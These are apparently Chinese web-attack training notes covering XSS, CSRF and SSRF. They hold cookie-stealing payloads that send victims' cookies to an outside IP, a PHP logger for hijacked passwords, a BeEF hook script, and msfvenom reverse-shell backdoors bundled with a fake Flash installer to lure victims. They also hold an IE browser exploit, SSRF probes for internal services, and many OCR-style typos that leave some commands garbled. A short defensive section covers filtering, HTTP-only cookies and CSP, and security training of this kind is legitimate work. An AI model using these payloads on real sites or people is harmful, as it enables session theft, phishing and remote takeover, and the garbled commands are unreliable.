【小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训笔记（WEB攻防35-40-XSS、CSRF、SSRF）

第35天 WEB攻防-通用漏洞&XSS跨站&反射&存储&DOM&盲打&劫持

知识点：

1、XSS跨站-原理&攻击&分类等
2、XSS跨站-反射型&存储型&DOM型等
3、XSS跨站攻击手法&劫持&恣取凭据等
4、XSS跨站-攻击项目&XSS平台&Beef-XSS

1、原理
指改击者利用网程序对用户输入过不足，端入可以量示在页面上对其他用尸道成影响的HTML代码，从而盗取用户资料、利用用户具份进行某种动或者对访问者进行病毒侵害的一种攻击方式，通过在用户端注入恶意的可执行脚本，若服务器时用户的第人不进行处理或处理不严，则浏览器就会夏接执行用户注入的脚本。
产生的地点：
数据文互的地方
get.post.headers
反馈与浏览
富文本编辑器
各类标签插入和自定义
数据输出的地方
用户资料
关键词、标签、说明
文件上传

2、分类
反射型（非持久型）
存储型（特久型）
DOM型
mXSS(突变型XSS)
UXSS(通用型XSs)
Flash XSS
UTF-7 XSS
MHTML XSS
CSS XSS
VBScript XSS

3、危害
网络钓鱼，包括获取各类用户账号：
窃取用户cookies资料，从而获取用户隐私信息，或利用用户身份对网站执行操作；
劫持用户（浏览器）会话，从而执行任意操作，例如非法转账、发表日志、邮件等；
强制弹出广告页面、刷流量等：
网页挂马；
进行恶意操作，如任意算改页面信息、别除文章等；
进行大量的客户端攻击，如ddos等；
获取客户端信息，如用户的浏览历史、真实即、开放端口等；
控制受害者机器向其他网站发起攻击；
结合其他漏洞，如cS什，实施进一步危害；
提升用户权限，包括进一步渗透网站；
传懂跨站却本螺虫等

#XSS跨站系列内容：
1加粗样式、XSS跨站-原理8分类8手法
2、XSS站-探针&利用&审计
3、XSS聘站-另类攻击手法利用
4、XSS跨站-防御修复8饶过策暗

演示案例：

XSS跨站-原理&分类&手法&探针
反射型实例-UA查询平台数据输出
思路：网站存在读取请求包中UA头并显示的功能–抓包修改UA头添加xss语句–xss语句执行
存储型实例-订单系统CMS权限获取
思路：留言板处会将输入保存到数据库中，后台管理员查看时会执行xss语句。此处xss语句可以替换为盗取cookie的语句，管理员执行后将管理员账号cookie发送到xss平台，从而盗取cookie。
DOM型实例-EmpireCMS前端页面审计
javascript:alter(1)这里不是传参，因此要改变写法
XSS利用环境-XSS平台&Beef-XSS项目
搭建beef-xss平台后，若受害者访问 <script src="http://192.168.1.105:3000/hook.js"></script> 则会被劫持浏览器，可以获取受害者cookie、跳转网站、钓鱼等。
参考文章：https://blog.csdn.net/qq_53517370/article/details/128992559

第36天 WEB攻防-通用漏洞&XSS跨站&MXSS&UXSS&FlashXSS&PDFXSS

知识点

mXSS(突变型XSS)
UXSS(通用型XSs)
Flash XSS
UTF-7 XSS
MHTML XSS
CSS XSS
VBScript XSS

演示案例：

UXSS-Edge&CVE-2021-34506
FlashXSS-PHPWind.&SWF反编译
PDFXSS-PDF动作添加&文件上传

#MXSS:https://www.fooying.com/the-art-of-xss-1-introduction/

#UXsS全称Jniversal Cross-.Site Scripting
UXSS是利用浏览器或者浏览器扩展漏洞来制造产生XSS并执行代码的一种攻击类型。
MICROSOFT EDGE UXSS CVE-2021-34506
Edge浏览器翻译功能导致JS语句被调用执行
https://www.bilibili.com/video/BV1fX4y1c7rX

#Flashxss-swf引用js的xss
JPEXS Free Flash Decompiler
phpwind SWF反编译Flashxss
Externallnterface.call执行JS代码
Payload:/res/js/dev/util_libs/jPlayer/Jplayer.swf?jQuery=alert(1)))catch(e)0//
思路：类似反射型XSS，通过对wsf文件进行反编译找出传参点，构造闭合传参使得xss语句执行

#PDFXSS-上传后直链发
1、创建PDF,加入动作JS
2、通过文件上传获取直链
3、直链地址访问后被缺发
危害：恶意pdf上传，受害者点击文件分享链接可被XSS平台和beefxss平台利用

第37天 WEB攻防-通用漏洞&XSS跨站&权限维持&钓鱼捆绑&浏览器漏洞

知识点

XSS跨站-另类攻击手法利用

演示案例：

XSS-后台植入Cookie&表单劫持
XSS-Flash钓鱼配合MSF捆绑上线
XSS-浏览器网马配合MSF访问上线

#XSS-后台植入Cookie&表单劫持
条件：已取得相关web权限后
1、写入代码到登录成功文件，利用beef或xSs平台实时监控Cookie等凭据实现权限维持
（思路：将xss语句写入登录成功的默认文件，用户登录成功后会直接将信息发送到xss平台）
2、若存在同源策路或防护情况下，Cookie获取失败可采用表单劫持或数据明文传输实现
（思路：将xss语句写入验证密码的文件，设置变量接收用户名和密码通过xss语句送到到VPS接收数据）

<?php
 
$u=$_GET['user'];
$p=$_GET['pass'];
$myfile = fopen("newfile.txt", "a+");
fwrite($myfile, $u);
fwrite($myfile, '|');
fwrite($myfile, $p);
fclose($myfile);
?>

#XSS-Flash钓鱼配合MSF捆绑上线
条件：beef上线受控后或直接钓鱼(受害者爱看SESE)
1、生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=6666-f exe
flash exe
2、下载官方文件保证安装正常
3、压缩捆绑文件-解压提取运行
4、MSF配置监听状态
use exploit/multi/handler
set payload windows/meterpreter/reverse tcp
set Ihost 0.0.0.0
set Iport 6666
run
5、诱使受害者访问URL-语言要适当
前期准备：后门文件准备：msf生成后门.exe文件，通过压缩将后门文件和flash安装文件放一起，压缩时选择解压前运行.exe文件，可对后门文件做免杀
诱使受害者访问构造好的flash页面–点击下载出插入xss语句–执行后门文件下载–压缩时运行 --上线

#XSS-浏览器网马配合MSF访问上线
条件：beef上线受控后或直接钓鱼(浏览器存在0day)
1、配置MSF生成URL
use exploit/windows/browser/ms14_064_ole_code_execution
set allowpowershellprompt true
set target 1
run
2、诱使受害者访问URL-语言要适当
思路：诱使受害者访问含有beefxss 语句的网站页面–beefxss平台执行网站跳转–跳转到含有payload的网站–上线

第38天 WEB攻防-通用漏洞&XSS跨站&绕过修复&http-only&CSP&标签符号

知识点

4、修复
1、过滤一些危险字符
2、HTTP-only Cookie
3、设置CSP(Content Security Policy)
4、输入内容长度限制，转义等

演示案例：

XSS绕过-CTFSHOW-361到331关卡绕过WP
XSS修复-过滤涵数&http_only&CSP&长度限制

绕过：https:z.aliyun.com/t/4067

316-反射型直接远程调用
前置知识：document.cookie是用来直接获取cookie的，window.location.href是获取跳转地址的
<script>window.location.href='http://47.94.236.117/get.php?c='+document.cookie</script>
317-反射型-过滤<script>
<img src=1onerror=window.location.href='http://47.94.236.117/getphp?c='+document cookie,>
318  319-反射型-过滤<img>
<inputonload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie:">
<svgonload="window.location.href='http://47.94.236.117/getphp?c='+document cookie;">
320-326-反射型过滤空格
<svg/onload="window.location.href='http://47.94.236.117/get.php?c='+document cookie;"
327存储型无过滤
<script>window.location href='http://47.94.236.117/get.php?c='+document cookie</script>
328存储型注册插入JS
<script>window.location.href='http://47.94.236.117/get.php?c='+document cookie</script>
思路：在密码处插入xss语句--获取cookie--抓包替换cookie--管理员权限获取flag（用户名处会过滤某些关键字 手动狗头）
329 存储型 失效凭据需1步完成所需操作
思路：利用js语句直接读取管理员页面中标签中的flag然后通过xss语句发送到vps
<script>
$('.laytable-cell-1-0-1').each(function(index,value){if(value.innerText.indexOf('ctfshow{')>-1){location.href='http://ip/x.php?cookie='+value.innerText}});
</script>
330-存储型-借助修改密码重置管理员密码(GET)  类似于crsf，通过xss代码注册，使得管理员执行修改密码的语句，攻击者获得密码后即可
<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>
331-存储型借助修改密码重置管理员密码P0ST)
<script>$.ajax({url 'http://127.0.0.1/api/change.php'type'post'.data {p'123'}});</script>

#XSS修复-过滤函数&http_only&CSP&长度限制
1、过滤一些危险字符，以及转义& <> " ·等危险字符
自定义过滤函数引用
2、HTTP-only Cookie
https://www.php.cn/php-ask-457831.html
php.in 设置或代码引用
session.cookie httponly =1
ini set(“session.cookie httponly”,1);

3、设置CSP(Content Security Policy) 防止资源外发 防止网页加载恶意脚本和其他危险资源
https://blog.csdn.net/a1766855068/article/details/89370320
header("Content-Security-Policy:img-src 'self ")
4、输入内容长度限制，实体转义等

第40天 WEB攻防-通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

知识点：

1、CSRF-原理&危害&探针&利用等
2、SSRF-原理&危害&探针&利用等
3、CSRF&SSRF-黑盒下漏洞探针点

#详细点：
CSRF全称：Cross-site request forgery,即，跨站请求伪造，也被称为“One Click Attack"或“Session Riding”，通常缩写为CSRF或者XSRF,，是一种对网站的恶意利用。举个生活中的例子：就是某个人点了个奇怪的链接，自己什么也没输，但自己的qg号或其他的号就被盗了。即该攻击可以在受害者不知情的情况下以受害者名义伪造请求，执行恶意操作，具有很大的危害性。
CSRF的攻击过程两个条件：
1、目标用户已经登录了网站，能够执行网站的功能。
2、目标用户访问了攻击者构造的URL,
CSRF安全问题黑盒怎么判断：
1、看验证来源不-修复
2、看凭据有无token-修复
3、看关键操作有无验证-修复
-CSRF安全问题白盒怎么审计：
同黑盒思路一样，代码中分析上述三看

SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏同。一股情况下，SS凡F攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔高的内部系统）SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容，加载指定地址的图片 地址等
SSRF黑盒可能出现的地方：

1.社交分享功能：获取超链接的标题等内容进行显示
2.转码服务：通过UL地址把原地址的网页内容调优使其适合手机屏幕浏览
3.在线到译：给网止到译对应网页的内容
4图片加载下载：例如富文本编辑器中的点击下载图片到本地；通过URL地址加载或下载图片
5.图片文章收载功能：主要其会取URL地址中titl以及文本的内容作为显示以求一个好的用具体验
6.云服务厂商：它会远程执行一些命令来判断网站是否存活等，所以如果可以捕获相应的信息，就可以进行ssrf测试
7.网站采集，网站抓取的地方：一些网站会针对你输入的u进行一些信悬采集工作
8.数后库内置功能：数据库的比如mongodb的copyDatabase函致
9.邮件系统：比如接收邮件服务器地址
10.编码处理，属性信息处理，文件处理：比如fpmg,ImageMagick,docX,pdf,Xml收处理器等
11.未公开的pi实现以及其他扩展调用URL的功能：可以利用g0ogle语法动加上这些关键字去寻找SSRF漏洞一些的url中的关键字：share、wap、url、ink、src、source、target、.u、3g、display、sourceURI、imageURL、domain.-.-
12.从远程服务器请求资源（upload from url如discuz!;mpot&expost rss feed如webblog;使用了xmi写引擎对象的地方如vordpress xmlrpc.php)

可能利用的伪协议：

file:/// 从文件系统中获取文件内容，如，file:///etc/passwd
dict:// 字典服务器协议，访问字典资源，如，dict:///ip:6739/info：
sftp:// SSH文件传输协议或安全文件传输协议
ldap:// 轻量级目录访问协议
tftp:// 简单文件传输协议
gopher:// 分布式文档传递服务，可使用gopherus生成payload

-SSRF白盒可能出现的地方：

1、功能点抓包指向代码块审计

2、功能点函数定位代码块审计

-SSRF常见安全修复防御方案：
1、禁用跳转

2、禁用不需要的协议

3、固定或限制资源地址

4、错误信息统一信息处理

#系列内容点：
1、CSRF&SSRF&原理&利用&协议等
2、CSRF&SSRF&黑盒&审计&修复等

演示案例：
CSRF-原理&后台自动添加管理员
SSRF-原理&服务&协议&内网&漏洞
SSRF-某实际案例测试演示（功能点）

#CSRF-原理&后台自动添加管理员
案例说明：小迪在登录后台管理自己网站的时候，突然群里给小迪说阿祖又说爱上别人了，随后给我发了个URL链接，小迪直接点了进去，GG!
小迪的网站：htp:/test.xiaodi8.com/
发送的URL:htp:∥47.94.236.117/add.html
利用流程：
1、获取目标的触发数据包
2、利用CSRFTestert构造导出
3、诱使受害者访问特定地址触发
上面的那个add.html就是增加管理员命令的那个数据包，至于这个URL的构造我们可以利用CSRFTester这个工具来构造，具体的流程就是首先通过前期的信息收集得知这个网站是由什么系统搭建的，那么我们就可以在本地搭建个一样的，然后打开这个工具，首先点击start，并且浏览器也要设置代理为本地的8008端口，然后在浏览器执行添加管理员的操作，抓到包之后就用from形式，然后点击右下角保存就是我们需要的地址，然后还要对这个数据包进行修改，只保留那个request2的，其他的全部删掉。
CSRF攻击需要满足三个条件：网站在管理员登录状态(或则不是网站的话其他的也得是登陆状态)，然后能构造数据包，并且构造的地址对方会点击。三个条件缺一不可。
通俗的解释CSRF:

“攻击者盗用了你的身份，以你的名义发送恶意请求”，CSRF是一种依赖web浏览器的、被混淆过的代理人攻击，往往涉及到个人隐私泄露以及财产安全。

csrf黑盒首先看有无token，第二点看能够触发的数据包的地址是不是管理员直接访问就可以直接触发成功，有没有验证过程，有的话能不能绕过，不能绕过就gg，第三个看同源策略，这个可以通过抓包去修改refer的值.

#SSRF-原理&服务&协议&内网&漏洞
-参考文章：https:w.t00ls.cc/articles-41070.html
案例说明：小迪在本地创建了远程图片文件加载应用，直接被攻击者利用SSF探针本地
及内网服务，并利用某漏洞直接获取到内网某主机的权限！
1、服务探针：
http://127.0.0.1:8081/
htp://127.0.0.1:3306/
2、协议玩法：（更多玩法见上图）
file:///D:/www.txt
dict://127.0.0.1:3306/info
ftp://192.168.46.148:21
3、内风扫描：
http://192.168.46.148:8080
4、漏洞利用：
msfvenom -p windows/meterpreter/reverse_http LHOST=47.94.236.117
LPORT=6688-f exe-o xx.exe
-监听：
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set Ihost 0.0.0.0
set Iport 6688
run
-下载：http://192.168.46.148:8080/?search==%00(.execlcmd.exe%20/c%20certutil%20-

第40天 WEB攻防-通用漏洞&CSRF&SSRF&代码审计&同源策略&加载函数

知识点

同上节

演示案例：

代码审计-CSRF.SCMSFH无验证

思路：添加用户出抓包–使用CSRF抓包工具构造添加指定管理员账户的html文件并将文件上传到vps–受害者在网站保持登录状态下访问构造好的vps文件链接–触发csrf语句添加指定管理员账户
代码审计：找到添加管理员add处代码–发现除了添加账户名的规则外无其他过滤–存在csrf漏洞

代码审计-CSRF-ZBLOG同源策略

思路：同上不走测试csrf漏洞，发现语句执行返回错误，代理审计发现添加管理员出含有referer监测–
两种绕过思路
1、伪造-需要在代码数据包文件固定来源 2、尝试在网站寻找可上传地方，上传数据包文件，取得当前同域名访问地址

代码审计-SSRF.Yzmcms功能&函数

思路：采集功能处写入文件读取代码–读取到服务器下文件

SSRF:
1、特定漏洞功能->代码段分析审计
2、特定漏洞函数->测试对应功能判断
功能点-采集审计
采集添加-测试-抓包-代码-远程请求资源操作（函数）
函数-功能审计
file_get_contents

特性挖掘审计
1.直接复现有没有
成功->有漏洞
失败->代码->缺陷过滤（绕过）->有漏洞
失败->代码->完整过滤->没有漏洞
来源检测：
1、伪造-需要在代码数据包文件固定来源
2、尝试在网站寻找可上传地方，上传数据包文件，取得当前同域名访问地址

其他漏洞：
关键函数和应用功能